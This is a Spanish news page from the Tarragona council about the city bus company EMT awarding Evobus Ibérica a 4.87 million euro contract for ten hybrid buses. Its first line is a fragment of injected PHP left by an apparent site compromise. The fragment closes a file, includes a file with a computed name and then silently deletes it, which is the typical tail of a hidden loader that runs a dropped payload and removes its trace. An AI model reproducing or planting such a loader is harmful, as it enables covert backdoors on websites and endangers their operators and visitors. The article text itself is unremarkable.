");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> La EMT de Tarragona adjudica el suministro de diez autobuses híbridos
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

La EMT de Tarragona adjudica el suministro de diez autobuses híbridos (02/08/2021)

La Empresa Municipal de Transportes (EMT) de Tarragona ha aprobado la adjudicación del suministro y mantenimiento de diez autobuses híbridos que modernizarán y harán más sostenible el actual parque de vehículos del transporte público municipal. De este modo, explica el presidente de la EMT, Jordi Fortuny, "seguimos el proceso de renovación previsto para retirar los autobuses más antiguos y contaminantes y sustituirlos por alternativas de transporte más verdes y sostenibles". La adjudicación se ha hecho efectiva en la empresa Evobus Ibérica SAU, que proporcionará a la EMT un total de 10 autobuses de tecnología híbrida: 8 vehículos de 12 a 13 metros y otros dos de 10 a 11 metros.

A partir de esta adjudicación se estima un periodo de nueve meses para hacer efectiva la dotación de los vehículos a la Empresa Municipal de Transportes y la supervisión, el mantenimiento y reparación de los mismos durante catorce años, vida útil estimada para el uso eficiente de estos autobuses.

Se trata, de un primer paso para avanzar hacia fórmulas sostenibles y verdes de transporte. En opinión de Jordi Fortuny, "queremos autobuses limpios. Trabajamos intensamente para que en el futuro todos los vehículos funcionen con hidrógeno y, por tanto, las emisiones sean cero. La incorporación de los autobuses híbridos un paso intermedio que debe ayudarnos a ser más sostenibles antes de conseguir ser totalmente verdes y ecológicos ".

La adjudicación se hace efectiva por un presupuesto de 4.869.400 euros. "Con esta medida", concluye Jordi Fortuny, "la EMT hace un esfuerzo para disponer de un servicio público esencial en las mejores condiciones posibles".

Fuente: Ayuntamiento de Tarragona

La EMT de Tarragona adjudica el suministro de diez autobuses híbridos

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona